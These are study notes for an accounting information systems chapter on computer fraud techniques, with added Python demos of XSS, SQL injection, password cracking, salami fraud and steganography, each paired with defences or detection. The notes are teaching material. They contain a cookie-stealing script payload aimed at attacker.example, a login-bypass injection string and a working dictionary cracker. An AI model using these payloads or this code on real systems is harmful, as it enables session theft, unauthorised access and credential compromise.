AIS Chapter 5

Chapter 5

Computer Fraud and Abuse Techniques

Computer Attacks and Abuse

Hacking

Unauthorized access, modification, or use of a computer system or other electronic device

Social Engineering

Techniques, usually psychological tricks, to gain access to sensitive data or information

Used to gain access to secure systems or locations

Malware

Any software which can be used to do harm

Types of Computer Attacks

Botnet (robot network)

Hijacking is gaining control of a computer to carry out illicit activities without the user's knowledge.

- A network of hijacked computers
- The hijacked computers carry out processes without their users' knowledge
- Zombie: a hijacked computer

Denial-of-Service (DoS) Attack

A flood of requests sent to a Web server (usually from a botnet) that overwhelms it and shuts down
service for legitimate users

Spamming

Sending the same unsolicited message to many people at the same time, often in an attempt to sell
something.

- Spammers also stage dictionary attacks (also called directory harvest attacks). Spammers use
special software to guess e-mail addresses at a company and send blank e-mail messages.
Messages that are not bounced usually belong to valid e-mail addresses, which are added to the
spammer's lists.

Spoofing

Making an electronic communication look as if it comes from a trusted official source to lure the
recipient into providing information
Types of Spoofing

E-mail

E-mail sender appears as if it comes from a different source

Caller-ID

Incorrect number is displayed

IP address

Forged IP address to conceal identity of sender of data over the Internet or to impersonate another
computer system

Address Resolution Protocol (ARP)

Sending forged ARP replies so that other hosts on a LAN associate a victim's IP address with the
attacker's hardware (MAC) address; traffic meant for the victim is then delivered to the attacker, who
can read it and forward it on

SMS

Incorrect number or name appears, similar to caller-ID but for text messaging

Web page

Phishing (see below)

DNS

Answering a name lookup with a forged record so that a request for a Web service is sent to a false
service instead of the genuine one

Hacking Attacks

Zero-day attack (or zero-hour attack) is an attack between the time a new software vulnerability is
discovered and the time the software developer releases a patch that fixes the problem.

Cross-Site Scripting (XSS)

Attacker-supplied script is inserted into a dynamic Web page (reflected from a request or stored in the
site's data) and runs in the browsers of other users who view the page, with that site's privileges.
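To make the mechanism concrete, here is an added Python example (not code from the page or the textbook) that renders a constructed comment two ways: dropping the input straight into the page markup, and HTML-encoding it first. The payload, the attacker.example host and the render functions are assumptions for illustration; the substring check stands in for a browser actually executing the script.

```python
import html


def render_unsafe(comment):
    """Vulnerable: user input is dropped straight into the page markup, so a
    comment containing a <script> element runs in every viewer's browser."""
    return f'<p class="comment">{comment}</p>'


def render_safe(comment):
    """Hardened: output encoding turns the characters that carry meaning in
    HTML (<, >, &, quotes) into entities, so the input is displayed as text."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def contains_active_content(markup):
    """Crude oracle for this demo only: does the rendered page contain a raw
    script element or inline event handler? Real defence is output encoding
    plus a Content-Security-Policy, not a substring check."""
    lowered = markup.lower()
    return "<script" in lowered or " onerror=" in lowered or " onload=" in lowered


def demo():
    # Constructed stored-XSS payload that a "reviewer" posted as a comment.
    payload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    unsafe = render_unsafe(payload)
    safe = render_safe(payload)
    return {
        "unsafe_executes": contains_active_content(unsafe),
        "safe_executes": contains_active_content(safe),
        "safe_markup": safe,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the encoded output is that the same bytes the attacker typed reach the viewer's screen, but as literal text rather than as markup the browser interprets.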

Buffer Overflow

More data is sent than the receiving buffer can hold, so it spills into adjacent memory and overwrites
the program's own control data (such as a return address) with attacker-chosen values, redirecting
execution to the attacker's instructions.

SQL Injection (Insertion)

Untrusted input is concatenated into the text of a database query, so quotes and SQL keywords in the
input change the query's meaning instead of being treated as data.
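An added Python example (not from the page or the textbook) showing the same login query built by string concatenation and with a parameterised statement. The users table, its rows and the `' OR '1'='1` payload are constructed for the demo; SQLite is used in memory so it runs offline.

```python
import sqlite3


def make_db():
    """Constructed sample database (not from the page): a two-row users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    """Concatenates untrusted input into the query text, so the attacker's
    input becomes part of the SQL statement instead of staying a plain value."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, name, password):
    """Parameterised query: the driver sends the values separately from the
    statement, so quotes and SQL keywords in the input are just data."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    row = conn.execute(sql, (name, password)).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    # Payload in the password field: closes the string and appends a tautology.
    # The vulnerable query becomes
    #   ... WHERE name = 'bob' AND password = '' OR '1'='1'
    # which is true for every row, so the first user (alice) is returned.
    payload = "' OR '1'='1"
    return {
        "vulnerable_no_password": login_vulnerable(conn, "bob", payload),
        "safe_no_password": login_safe(conn, "bob", payload),
        "safe_right_password": login_safe(conn, "bob", "hunter2"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that the injected tautology does not merely log the attacker in as bob: it returns whichever row the database happens to produce first, here alice, which is why authentication bypass via injection often lands in the first (frequently administrative) account.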

Man-in-the-Middle

Hacker places themselves between client and host and relays the traffic, reading or altering it as it
passes.


Masquerading or impersonation is pretending to be an authorized user to access a system. This is
possible when the perpetrator knows the user’s ID number and password or uses her computer after
she has logged in (while the user is in a meeting or at lunch).

Piggybacking has several meanings:

1. The clandestine use of a neighbor's Wi-Fi network; this can be prevented by enabling the security
features in the wireless network (encryption and a strong passphrase, e.g. WPA2 or WPA3).

2. Tapping into a communications line and electronically latching onto a legitimate user before the user
enters a secure system; the legitimate user unknowingly carries the perpetrator into the system.

3. An unauthorized person following an authorized person through a secure door, bypassing physical
security controls such as keypads, ID cards, or biometric identification scanners.

Additional Hacking Attacks

Password Cracking

Recovering users' passwords, typically by stealing the stored password hashes and then guessing
candidates (dictionary or brute-force attacks) until one hashes to the same value
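An added Python example (not from the page or the textbook) of the offline dictionary attack described above, run against a constructed "stolen" table of salted SHA-256 hashes. The users, passwords, wordlist and the salt-then-password hashing scheme are assumptions for the demo.

```python
import hashlib
import os


def hash_password(password, salt):
    """Hash as the (weak) sample system does: sha256(salt || password).
    Real systems should use a deliberately slow KDF (bcrypt, scrypt, Argon2,
    or PBKDF2 with a high iteration count) so each guess costs the attacker more."""
    return hashlib.sha256(salt + password.encode()).digest()


def make_leak():
    """Constructed 'stolen' credential table of (user, salt, hash) rows."""
    table = []
    for user, pw in [("alice", "password1"), ("bob", "Winter2024!"), ("carol", "x9#Qv!t7Lp2z")]:
        salt = os.urandom(8)
        table.append((user, salt, hash_password(pw, salt)))
    return table


# Constructed wordlist; real attacks use lists of millions of leaked passwords.
WORDLIST = ["123456", "password", "password1", "letmein", "Winter2024", "Winter2024!"]


def crack(table, wordlist):
    """Offline dictionary attack: hash each candidate with each user's salt and
    compare against the stolen hash. The salt forces one hash per (word, user)
    pair instead of one per word, but it cannot save a user whose password is
    in the wordlist. Returns the recovered passwords and the number of guesses."""
    recovered = {}
    attempts = 0
    for user, salt, target in table:
        for word in wordlist:
            attempts += 1
            if hash_password(word, salt) == target:
                recovered[user] = word
                break
    return recovered, attempts


if __name__ == "__main__":
    found, guesses = crack(make_leak(), WORDLIST)
    print(f"{len(found)} of 3 passwords recovered in {guesses} guesses: {found}")
```

Only carol survives, because her password is not in the wordlist; the salt did nothing for alice or bob beyond doubling the work. That is the practical argument for both a slow hash and a password policy that rejects dictionary words.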

War Dialing

Computer automatically dials phone numbers looking for modems.

Phreaking

Attacks on phone systems to obtain free phone service.

Data Diddling

Making changes to data before, during, or after it is entered into a system.

Data Leakage

Unauthorized copying of company data.

Hacking Embezzlement Schemes

Podslurping is using a small device with storage capacity, such as an iPod or Flash drive, to download
unauthorized data.

Salami Technique

Taking amounts too small to be noticed (for example, the fraction of a cent left over when interest is
rounded) from many different accounts and accumulating them in an account the perpetrator controls.
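An added Python example (not from the page or the textbook) that simulates the rounding variant of the scheme on constructed customer balances and then runs the detection check an auditor would want: which account is collecting many sub-cent credits from many distinct sources? The balances, interest rate, account "X" and the thresholds are assumptions.

```python
from collections import defaultdict
from decimal import Decimal, ROUND_DOWN

RATE = Decimal("0.0123")  # constructed interest rate


def post_interest(balances, rate, skim_to=None):
    """Post interest truncated to the cent. If skim_to is set, this is the
    fraud: every shaved fraction is credited to that account. Returns the
    journal as (account, memo, amount) entries."""
    journal = []
    for acct, bal in balances.items():
        exact = bal * rate
        paid = exact.quantize(Decimal("0.01"), rounding=ROUND_DOWN)
        journal.append((acct, "interest", paid))
        shaved = exact - paid
        if skim_to is not None and shaved > 0:
            journal.append((skim_to, f"rounding:{acct}", shaved))
    return journal


def find_salami_suspects(journal, max_amount=Decimal("0.01"), min_sources=10):
    """Detection: an account receiving many tiny credits from many distinct
    sources is the signature of a salami scheme. Returns
    {account: (number_of_sources, total_collected)} for accounts over threshold."""
    sources = defaultdict(set)
    totals = defaultdict(Decimal)
    for acct, memo, amount in journal:
        if 0 < amount < max_amount:
            sources[acct].add(memo)
            totals[acct] += amount
    return {a: (len(s), totals[a]) for a, s in sources.items() if len(s) >= min_sources}


def sample_balances():
    """Constructed balances for 50 customer accounts."""
    return {f"C{i:03d}": Decimal(1000 + 37 * i) for i in range(50)}


def demo_fraud():
    return find_salami_suspects(post_interest(sample_balances(), RATE, skim_to="X"))


def demo_clean():
    return find_salami_suspects(post_interest(sample_balances(), RATE))


if __name__ == "__main__":
    print("with skimming:", demo_fraud())
    print("honest run:   ", demo_clean())
```

Each individual entry is below a cent and invisible on a customer statement; only the aggregate view across sources exposes account X, which is why the control is a journal-level query rather than a per-transaction limit.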

Economic Espionage

Theft of information, trade secrets, and intellectual property.

Internet Terrorism

Act of disrupting electronic commerce and harming computers


Cyber-extortion is threatening to harm a company or a person if a specified amount of money is not
paid, for example by threatening to release compromising videos or pictures.

Cyber-Bullying

Using the Internet, cell phones, or other communication technologies to support deliberate, repeated,
and hostile behavior that torments, threatens, harasses, humiliates, embarrasses, or otherwise harms
another person.

Sexting is exchanging sexually explicit text messages and revealing pictures, usually by means of a
phone. One particularly degrading form of cyber-bullying is posting or sharing these pictures and
messages with people who were never intended to see or read them.


Hacking for Fraud

Internet Misinformation (Fake News)

Using the Internet to spread false or misleading information

Internet Auction

Using an Internet auction site to defraud another person

- Unfairly driving up bidding
- Seller delivers inferior merchandise or fails to deliver at all
- Buyer fails to make payment

Internet Pump-and-Dump

Using the Internet to pump up the price of a stock and then selling it

- Click fraud is manipulating click numbers to inflate advertising bills.
- Web cramming is offering a free website for a month, developing a worthless website, and
charging the phone bill of the people who accept the offer for months, whether they want to
continue using the website or not.

Software piracy is the unauthorized copying or distribution of copyrighted software. Three frequent
forms of software piracy include:

(1) selling a computer with preloaded illegal software,

(2) installing a single-license copy on multiple machines, and

(3) loading software on a network server and allowing unrestricted access to it in violation of the
software license agreement.
Social Engineering Techniques

Identity Theft

Assuming someone else’s identity

Pretexting

Inventing a scenario that will lull someone into divulging sensitive information

Posing

Using a fake business to acquire sensitive information

Phishing

Posing as a legitimate company asking for verification type information: passwords, accounts,
usernames

Pharming

Redirecting Web site traffic to a spoofed Web site.

Carding refers to activities performed on stolen credit cards, including making a small online purchase
to determine whether the card is still valid and buying and selling stolen credit card numbers.

Typosquatting

Registering domain names that are common misspellings of a legitimate Web site's name, so that a
typographical error when entering the address takes the user to the squatter's site instead

Tabnabbing

Changing the content of an already open browser tab, while the user is looking elsewhere, into a fake
login page that captures credentials

Scavenging

Looking for sensitive information in items thrown away

Shoulder Surfing

Snooping over someone’s shoulder for sensitive information

More Social Engineering

Lebanese Looping

Inserting a sleeve into an ATM card slot that traps the victim's card; the perpetrator observes (or
"helpfully" asks for) the PIN, then retrieves the card after the victim leaves

Skimming

Double-swiping a credit card through a second, concealed reader that copies the magnetic-stripe data
for later cloning


Chipping

Planting a device to read credit card information in a credit card reader

Eavesdropping

Listening to private communications

Types of Malware

Spyware

Secretly monitors and collects personal information about users and sends it to someone else

Adware

Pops up banner ads on a monitor, collects information about the user's Web-surfing and spending
habits, and forwards it to the adware creator

Scareware is software that is often malicious, is of little or no benefit, and is sold using scare tactics.
That is, it uses fear to motivate some sort of user action. The most common scare tactic is a dire warning
that a computer is infected with a virus, spyware, or some other catastrophic problem. Some scareware
even warns that a user’s job, career, or marriage is at risk.

Key logging

Records computer activity, such as a user’s keystrokes, e-mails sent and received, Web sites visited, and
chat session participation

Trojan Horse

Malicious computer instructions in an authorized and otherwise properly functioning program

Time bombs/logic bombs

Idle until triggered by a specified date or time, by a change in the system, by a message sent to the
system, or by an event that does not occur

More Malware

Trap Door/Back Door

A way into a system that bypasses normal authorization and authentication controls

Packet Sniffers

Capture data from information packets as they travel over networks


Steganography program - A program that merges confidential information into a seemingly harmless host
file (such as an image or audio file), optionally password-protects it, and sends it anywhere in the world,
where the file is unlocked and the confidential information is reassembled. The host file can still be
heard or viewed because humans are not sensitive enough to notice the slight decrease in image or
sound quality.
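An added Python example (not from the page or any particular steganography product) of the merging step: hiding a message in the least-significant bit of each sample of a cover file, and recovering it. The cover is a constructed run of 8-bit samples standing in for a grayscale image or audio track; the length-prefix layout is an assumption, and the password-protection step the text mentions is not implemented here.

```python
def _bits(data):
    """Yield the bits of a byte string, most significant bit of each byte first."""
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def _bytes_from_lsb(samples, count):
    """Rebuild `count` bytes from the least-significant bits of consecutive samples."""
    out = bytearray()
    for k in range(count):
        value = 0
        for j in range(8):
            value = (value << 1) | (samples[8 * k + j] & 1)
        out.append(value)
    return bytes(out)


def embed(cover, secret):
    """Hide `secret` in the LSB of each cover sample. Layout (assumed for this
    demo): 32-bit big-endian length, then the message bytes. Each sample
    changes by at most 1, which is why the host still looks or sounds normal."""
    payload = len(secret).to_bytes(4, "big") + secret
    if len(payload) * 8 > len(cover):
        raise ValueError("cover too small for payload")
    stego = bytearray(cover)
    for idx, bit in enumerate(_bits(payload)):
        stego[idx] = (stego[idx] & 0xFE) | bit
    return bytes(stego)


def extract(stego):
    """Read the length prefix, then that many message bytes."""
    length = int.from_bytes(_bytes_from_lsb(stego, 4), "big")
    return _bytes_from_lsb(stego[32:], length)


def max_sample_change(cover, stego):
    """Largest per-sample difference the embedding introduced."""
    return max(abs(a - b) for a, b in zip(cover, stego))


# Constructed cover (1024 samples, a smooth ramp repeated) and secret message.
COVER = bytes(range(256)) * 4
SECRET = b"wire 4200 to account 7781"

if __name__ == "__main__":
    stego = embed(COVER, SECRET)
    print("recovered:", extract(stego))
    print("max change per sample:", max_sample_change(COVER, stego))
```

The recovered bytes are identical to the input while no sample moved by more than one unit of 255, which is below the threshold a viewer or listener notices. The flip side for a defender is that LSB embedding is also statistically detectable, and the channel disappears entirely if the file is re-encoded (for example, lossy JPEG compression) in transit.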

Rootkit

Used to hide the presence of trap doors, sniffers, and key loggers; conceal software that originates a
denial-of-service or an e-mail spam attack; and access user names and log-in information

Superzapping

Unauthorized use of special system programs to bypass regular system controls and perform illegal acts,
all without leaving an audit trail

A computer worm is a self-replicating computer program similar to a virus, with some exceptions:

1. A virus is a segment of code hidden in or attached to a host program or executable file, whereas a
worm is a stand-alone program.

2. A virus requires a human to do something (run a program, open a file, etc.) to replicate itself, whereas
a worm does not and actively seeks to send copies of itself to other network devices.

3. Worms harm networks (if only by consuming bandwidth), whereas viruses infect or corrupt files on the
computers they run on.

Bluesnarfing - Stealing (snarfing) contact lists, images, and other data using flaws in Bluetooth
applications. Normally, before a Bluetooth connection can be made, the person contacted must agree to
accept the link.
